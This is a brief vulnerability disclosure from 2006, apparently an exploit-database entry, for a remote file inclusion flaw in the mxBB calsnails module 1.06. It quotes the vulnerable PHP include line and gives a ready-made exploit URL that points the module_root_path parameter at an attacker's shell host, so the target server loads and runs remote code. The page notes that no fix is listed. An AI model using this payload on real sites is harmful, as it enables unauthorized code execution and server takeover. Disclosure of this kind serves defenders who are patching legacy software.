mxBB Module calsnails 1.06 (mx_common.php) File Include Vulnerability

2006-11-17 00:00:00

##################################################################
# #
# mxBB calsnails module 1.06 Remote File Inclusion Vulnerability #
# #
# Bugfounder: bd0rk || SOH-Crew #
# #
# Website: www.soh-crew.it.tt #
# #
# Gr33tings: nukedx, DeeJay, TheJT, str0ke #
# #
##################################################################

Mod-Download: http://www.mx-system.com/modules/mx_pafiledb/dload.php?action=download&file_id=21

Vulnerable Code: include_once($module_root_path . 'includes/cal_settings.'.$phpEx);

[+]Exploit: http://[site]/[path]/includes/mx_common.php?module_root_path=http://Y0urSh3LL?

#

Fixes

No fixes

In order to submit a new fix you need to be registered.